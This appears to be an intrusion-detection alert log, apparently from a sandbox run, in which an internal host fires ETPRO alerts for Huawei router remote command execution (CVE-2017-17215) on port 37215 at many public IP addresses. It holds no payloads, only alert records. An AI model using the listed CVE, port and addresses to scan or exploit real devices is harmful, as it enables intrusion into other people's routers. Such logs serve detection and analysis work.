                                                    07/10/24-08:26:55.460138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4097037215192.168.2.14163.66.244.106
                                                    07/10/24-08:26:45.632030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721637215192.168.2.14197.62.86.5
                                                    07/10/24-08:27:08.389316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4833037215192.168.2.14197.218.182.252
                                                    07/10/24-08:26:41.545063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3421837215192.168.2.14157.213.65.106
                                                    07/10/24-08:27:17.078951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5380037215192.168.2.14157.110.209.56
                                                    07/10/24-08:27:17.083690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3292437215192.168.2.14115.92.106.18
                                                    07/10/24-08:26:43.894191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5931037215192.168.2.14146.114.153.86
                                                    07/10/24-08:26:45.633431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874437215192.168.2.1441.22.205.238
                                                    07/10/24-08:26:28.912225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710637215192.168.2.1441.16.188.66
                                                    07/10/24-08:27:10.621432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3954637215192.168.2.14197.38.89.6
                                                    07/10/24-08:27:22.844415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5363637215192.168.2.14160.60.94.97
                                                    07/10/24-08:26:22.269979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5806437215192.168.2.1441.247.70.62
                                                    07/10/24-08:27:22.835700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3794637215192.168.2.1441.11.222.148
                                                    07/10/24-08:26:11.544307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3598037215192.168.2.1466.8.227.125
                                                    07/10/24-08:26:25.456232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3528237215192.168.2.1441.12.227.193
                                                    07/10/24-08:27:30.414315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5275637215192.168.2.14157.150.195.246
                                                    07/10/24-08:26:25.456232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5143837215192.168.2.14197.179.44.109
                                                    07/10/24-08:27:13.964289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428037215192.168.2.14157.163.248.6
                                                    07/10/24-08:27:33.769630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352637215192.168.2.14157.168.243.102
                                                    07/10/24-08:26:43.766311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5342637215192.168.2.14157.124.212.30
                                                    07/10/24-08:27:22.936738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4598637215192.168.2.14118.135.44.90
                                                    07/10/24-08:26:38.615907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5242437215192.168.2.14157.132.209.152
                                                    07/10/24-08:27:30.428710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3627237215192.168.2.14157.213.41.33
                                                    07/10/24-08:27:07.361237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4916837215192.168.2.14157.233.120.78
                                                    07/10/24-08:26:17.928888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6039237215192.168.2.1441.78.249.216
                                                    07/10/24-08:26:26.565464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5280437215192.168.2.14174.44.79.185
                                                    07/10/24-08:26:20.188191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5288837215192.168.2.1441.112.206.105
                                                    07/10/24-08:27:31.475226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3417037215192.168.2.14120.9.190.141
                                                    07/10/24-08:26:23.344652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5562837215192.168.2.1441.170.58.186
                                                    07/10/24-08:26:34.187419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3982037215192.168.2.14157.42.253.180
                                                    07/10/24-08:27:05.139248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5061437215192.168.2.14197.147.3.165
                                                    07/10/24-08:26:33.255405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5092037215192.168.2.1445.191.37.236
                                                    07/10/24-08:26:22.222515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3874437215192.168.2.14197.222.241.115
                                                    07/10/24-08:27:34.142714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4314237215192.168.2.1441.240.230.95
                                                    07/10/24-08:26:45.685620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434837215192.168.2.14157.195.210.212
                                                    07/10/24-08:27:08.412825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3361437215192.168.2.14197.97.91.65
                                                    07/10/24-08:27:14.863402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621437215192.168.2.14197.126.193.185
                                                    07/10/24-08:27:24.976669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5105837215192.168.2.14157.1.91.91
                                                    07/10/24-08:26:14.829597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727837215192.168.2.1450.243.166.249
                                                    07/10/24-08:26:25.492414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4361437215192.168.2.14135.149.8.144
                                                    07/10/24-08:26:28.876491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4648037215192.168.2.14197.224.187.70
                                                    07/10/24-08:26:29.832636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6001037215192.168.2.14102.231.247.232
                                                    07/10/24-08:26:43.715321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4152237215192.168.2.14222.116.173.0
                                                    07/10/24-08:27:24.986778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5320237215192.168.2.14157.244.141.221
                                                    07/10/24-08:26:25.488063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3617037215192.168.2.14157.188.193.181
                                                    07/10/24-08:27:03.033407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5691637215192.168.2.1441.123.153.116
                                                    07/10/24-08:27:31.561854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5729837215192.168.2.1441.186.174.142
                                                    07/10/24-08:26:28.801971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5502837215192.168.2.14157.115.37.248
                                                    07/10/24-08:26:55.472197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4557037215192.168.2.1441.211.58.74
                                                    07/10/24-08:26:13.833897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3911037215192.168.2.14197.104.98.226
                                                    07/10/24-08:26:26.617317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080237215192.168.2.14157.29.179.29
                                                    07/10/24-08:26:41.626550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4071837215192.168.2.14157.223.46.248
                                                    07/10/24-08:27:02.966535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4162437215192.168.2.1441.171.132.33
                                                    07/10/24-08:27:02.872707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362037215192.168.2.1417.20.149.15
                                                    07/10/24-08:26:23.340095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060437215192.168.2.14197.68.153.160
                                                    07/10/24-08:27:27.047085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3811837215192.168.2.14157.222.199.131
                                                    07/10/24-08:26:49.911727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586837215192.168.2.14157.75.189.49
                                                    07/10/24-08:26:38.555542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3805237215192.168.2.14157.104.84.95
                                                    07/10/24-08:26:43.813541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834837215192.168.2.1441.194.45.185
                                                    07/10/24-08:26:49.824367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021837215192.168.2.14157.96.40.129
                                                    07/10/24-08:27:28.138787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5948837215192.168.2.14197.191.216.7
                                                    07/10/24-08:26:57.657742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639237215192.168.2.14157.119.254.103
                                                    07/10/24-08:26:59.627157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3985437215192.168.2.1441.211.132.1
                                                    07/10/24-08:27:03.044130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852437215192.168.2.14157.155.98.84
                                                    07/10/24-08:27:19.236089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3394037215192.168.2.1441.228.195.113
                                                    07/10/24-08:26:15.854117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564437215192.168.2.14197.192.190.154
                                                    07/10/24-08:27:02.784387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4435037215192.168.2.1441.179.229.111
                                                    07/10/24-08:26:33.207686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5841837215192.168.2.1460.34.4.141
                                                    07/10/24-08:26:31.056183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3963237215192.168.2.14102.140.16.5
                                                    07/10/24-08:26:34.212749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497037215192.168.2.14197.161.92.178
                                                    07/10/24-08:27:05.114349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6091437215192.168.2.1441.93.34.109
                                                    07/10/24-08:27:30.562651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591237215192.168.2.14197.155.163.227
                                                    07/10/24-08:27:33.879703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4896037215192.168.2.1441.172.238.36
                                                    07/10/24-08:26:15.881415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5016637215192.168.2.1441.28.33.25
                                                    07/10/24-08:27:10.609490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3843237215192.168.2.14157.217.104.104
                                                    07/10/24-08:27:17.083690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4330437215192.168.2.14191.198.233.86
                                                    07/10/24-08:26:25.493700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5721637215192.168.2.1441.40.175.201
                                                    07/10/24-08:27:33.758837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4553037215192.168.2.1441.179.76.220
                                                    07/10/24-08:26:41.493980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4128837215192.168.2.14157.221.31.99
                                                    07/10/24-08:26:59.875965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3504637215192.168.2.14157.79.7.244
                                                    07/10/24-08:27:05.164451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5396037215192.168.2.14171.5.193.221
                                                    07/10/24-08:26:36.401393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686037215192.168.2.14140.189.31.129
                                                    07/10/24-08:26:59.550214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022237215192.168.2.14158.211.16.135
                                                    07/10/24-08:26:33.257130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3409437215192.168.2.14134.172.34.250
                                                    07/10/24-08:26:43.895617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993637215192.168.2.1413.25.215.93
                                                    07/10/24-08:27:10.535959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3657637215192.168.2.1472.167.231.224
                                                    07/10/24-08:26:11.486385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4942637215192.168.2.14197.99.215.32
                                                    07/10/24-08:27:07.401020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3515637215192.168.2.1441.188.56.29
                                                    07/10/24-08:27:19.266655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5194437215192.168.2.1457.18.88.227
                                                    07/10/24-08:26:34.208952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4752637215192.168.2.14157.237.245.36
                                                    07/10/24-08:26:13.822021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5398437215192.168.2.14197.106.243.39
                                                    07/10/24-08:26:14.771474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174637215192.168.2.14189.152.127.207
                                                    07/10/24-08:27:32.572327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5209037215192.168.2.14157.178.42.136
                                                    07/10/24-08:26:26.591282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578637215192.168.2.14157.212.80.244
                                                    07/10/24-08:26:36.373846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339237215192.168.2.14187.170.206.202
                                                    07/10/24-08:26:36.411416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3300037215192.168.2.1465.196.89.42
                                                    07/10/24-08:26:49.818976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3458637215192.168.2.14210.206.174.75
                                                    07/10/24-08:26:42.451882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4534837215192.168.2.1441.173.234.253
                                                    07/10/24-08:26:59.844972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5487837215192.168.2.1441.24.44.68
                                                    07/10/24-08:27:05.238530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5324037215192.168.2.1441.7.97.242
                                                    07/10/24-08:27:19.146990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3942437215192.168.2.14189.228.58.8
                                                    07/10/24-08:27:34.131322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4614037215192.168.2.1441.40.97.55
                                                    07/10/24-08:27:33.837652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6064837215192.168.2.1441.37.174.62
                                                    07/10/24-08:26:57.596939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5563637215192.168.2.1441.186.166.74
                                                    07/10/24-08:27:27.114330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3828837215192.168.2.14124.180.248.95
                                                    07/10/24-08:27:32.587854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4189037215192.168.2.14197.222.127.137
                                                    07/10/24-08:26:20.177629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4463837215192.168.2.1444.116.213.33
                                                    07/10/24-08:27:02.843414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5467237215192.168.2.1467.211.100.44
                                                    07/10/24-08:27:08.357813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5032237215192.168.2.14157.96.163.96
                                                    07/10/24-08:26:22.297520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362637215192.168.2.14157.103.58.170
                                                    07/10/24-08:26:20.192281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4445237215192.168.2.14197.33.126.245
                                                    07/10/24-08:27:22.772225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5045237215192.168.2.14157.159.136.221
                                                    07/10/24-08:27:31.550771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5704437215192.168.2.1484.214.204.35
                                                    07/10/24-08:26:25.514524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797837215192.168.2.14197.79.30.176
                                                    07/10/24-08:26:20.080140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5064237215192.168.2.14197.113.63.111
                                                    07/10/24-08:26:59.765142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4400437215192.168.2.1441.160.150.115
                                                    07/10/24-08:26:26.537875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4450237215192.168.2.1474.30.5.144
                                                    07/10/24-08:26:43.681419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5054437215192.168.2.14197.157.46.223
                                                    07/10/24-08:27:27.094763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5314037215192.168.2.1441.249.10.144
                                                    07/10/24-08:26:53.228300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5431837215192.168.2.14197.62.130.3
                                                    07/10/24-08:26:57.633994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4588837215192.168.2.1441.128.131.174
                                                    07/10/24-08:27:14.028611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4142837215192.168.2.14197.39.214.253
                                                    07/10/24-08:27:02.857576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6049237215192.168.2.14157.116.103.27
                                                    07/10/24-08:26:31.075105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399037215192.168.2.14112.187.188.206
                                                    07/10/24-08:27:28.177023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5743037215192.168.2.1441.172.101.227
                                                    07/10/24-08:27:10.664170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5905037215192.168.2.14157.167.141.91
                                                    07/10/24-08:27:24.970065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5272437215192.168.2.1438.15.42.197
                                                    07/10/24-08:26:43.791767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5284037215192.168.2.14157.177.17.147
                                                    07/10/24-08:27:08.292771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484237215192.168.2.142.170.24.212
                                                    07/10/24-08:26:36.375795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255037215192.168.2.14157.213.126.122
                                                    07/10/24-08:27:05.209261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5995837215192.168.2.14157.255.88.31
                                                    07/10/24-08:27:22.532375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3330437215192.168.2.14157.208.242.229
                                                    07/10/24-08:27:23.929861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3680637215192.168.2.14202.29.165.6
                                                    07/10/24-08:26:41.549796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6002637215192.168.2.1482.194.237.189
                                                    07/10/24-08:26:11.469392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359837215192.168.2.14132.170.141.1
                                                    07/10/24-08:27:32.605681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4634637215192.168.2.14142.11.170.168
                                                    07/10/24-08:26:11.590695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385237215192.168.2.14130.62.248.59
                                                    07/10/24-08:26:36.383866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3871037215192.168.2.14197.208.53.115
                                                    07/10/24-08:27:08.383714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494437215192.168.2.14197.14.126.161
                                                    07/10/24-08:26:13.829838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5096837215192.168.2.14135.160.124.223
                                                    07/10/24-08:26:22.300019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4773037215192.168.2.1441.79.254.206
                                                    07/10/24-08:27:34.131322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6074437215192.168.2.14137.100.57.109
                                                    07/10/24-08:26:25.503174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5910037215192.168.2.14157.136.175.21
                                                    07/10/24-08:26:26.576536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4915637215192.168.2.1441.242.212.199
                                                    07/10/24-08:27:08.435452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5951837215192.168.2.1441.222.87.243
                                                    07/10/24-08:26:11.198321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3730237215192.168.2.14197.158.255.222
                                                    07/10/24-08:26:34.217028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3661437215192.168.2.14157.99.100.183
                                                    07/10/24-08:26:13.824053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191037215192.168.2.1441.95.242.218
                                                    07/10/24-08:26:28.922659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813237215192.168.2.14197.18.120.171
                                                    07/10/24-08:26:59.542620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3655237215192.168.2.1441.230.53.23
                                                    07/10/24-08:27:23.959862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3512837215192.168.2.14197.249.37.86
                                                    07/10/24-08:26:52.005706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4745637215192.168.2.14157.117.149.175
                                                    07/10/24-08:27:28.176056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5530837215192.168.2.14157.101.130.193
                                                    07/10/24-08:27:33.761946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5560237215192.168.2.14157.71.60.193
                                                    07/10/24-08:26:13.850183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4605437215192.168.2.1441.27.126.23
                                                    07/10/24-08:27:27.126836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3870837215192.168.2.14204.60.115.180
                                                    07/10/24-08:27:03.009632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3519837215192.168.2.14114.228.38.239
                                                    07/10/24-08:26:51.990112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3822637215192.168.2.1441.134.200.20
                                                    07/10/24-08:26:26.612913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3685437215192.168.2.14157.124.250.16
                                                    07/10/24-08:27:13.761850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5146037215192.168.2.14157.175.150.16
                                                    07/10/24-08:26:29.856940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5209637215192.168.2.14197.252.133.30
                                                    07/10/24-08:26:29.766874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5772837215192.168.2.14197.194.209.54
                                                    07/10/24-08:26:14.743404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4875237215192.168.2.14197.186.229.77
                                                    07/10/24-08:27:28.165793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5930037215192.168.2.1424.214.181.63
                                                    07/10/24-08:26:13.753198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457037215192.168.2.14197.66.186.228
                                                    07/10/24-08:26:31.074036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3617037215192.168.2.14157.83.238.220
                                                    07/10/24-08:26:41.482479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4937037215192.168.2.14197.159.123.52
                                                    07/10/24-08:27:13.865761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790637215192.168.2.1498.247.134.25
                                                    07/10/24-08:26:49.809017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940437215192.168.2.14157.243.135.136
                                                    07/10/24-08:26:13.720091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3321437215192.168.2.14197.117.175.135
                                                    07/10/24-08:26:25.411489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4112837215192.168.2.14157.160.129.211
                                                    07/10/24-08:26:31.071097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131237215192.168.2.148.198.239.122
                                                    07/10/24-08:27:22.853545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3637837215192.168.2.1441.150.206.113
                                                    07/10/24-08:26:20.130042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5715037215192.168.2.1441.203.128.48
                                                    07/10/24-08:26:43.704112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5364237215192.168.2.1441.195.72.229
                                                    07/10/24-08:26:26.597215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899237215192.168.2.1441.39.28.244
                                                    07/10/24-08:26:28.633014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5010837215192.168.2.14157.221.158.69
                                                    07/10/24-08:27:30.468410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4850437215192.168.2.14157.240.97.200
                                                    07/10/24-08:27:05.150290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4240837215192.168.2.14157.90.97.4
                                                    07/10/24-08:26:41.418203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5267437215192.168.2.1441.157.201.20
                                                    07/10/24-08:27:33.792052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4445437215192.168.2.1441.220.244.76
                                                    07/10/24-08:26:22.211472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768237215192.168.2.1441.57.182.80
                                                    07/10/24-08:26:43.846786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4642437215192.168.2.14157.242.172.178
                                                    07/10/24-08:26:15.827903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3742637215192.168.2.1441.140.187.35
                                                    07/10/24-08:26:34.215395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3514037215192.168.2.1441.155.56.122
                                                    07/10/24-08:26:26.593933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967637215192.168.2.1441.31.66.150
